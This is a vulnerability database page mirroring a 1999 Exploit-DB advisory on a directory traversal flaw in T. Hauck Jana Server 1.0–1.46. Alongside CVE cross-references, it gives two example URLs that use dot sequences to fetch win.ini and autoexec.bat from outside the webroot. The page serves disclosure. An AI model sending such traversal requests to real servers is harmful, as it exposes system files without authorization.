Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbJason LutzEDB-ID:19540
HistoryOct 08, 1999 - 12:00 a.m.

T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal

1999-10-0800:00:00
Jason Lutz
www.exploit-db.com
13

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/699/info


The Jana webserver is susceptible to directory traversal attacks using multiple dots in the URL. If the request is made in specific formats, the server will send out files outside of the intended webroot. 


http ://target/./.././.././.././win.ini
or
http ://target/....../autoexec.bat

Related

nvd 2
cve 2
cvelist 2
nvd
nvd
CVE-1999-1082
1999-10-08 04:00:00
CVE-1999-1083
1999-10-08 04:00:00
cve
cve
CVE-1999-1083
2001-09-12 04:00:00
CVE-1999-1082
2001-09-12 04:00:00
cvelist
cvelist
CVE-1999-1082
2001-09-12 04:00:00
CVE-1999-1083
2001-09-12 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:19540
nvd2cve2cvelist2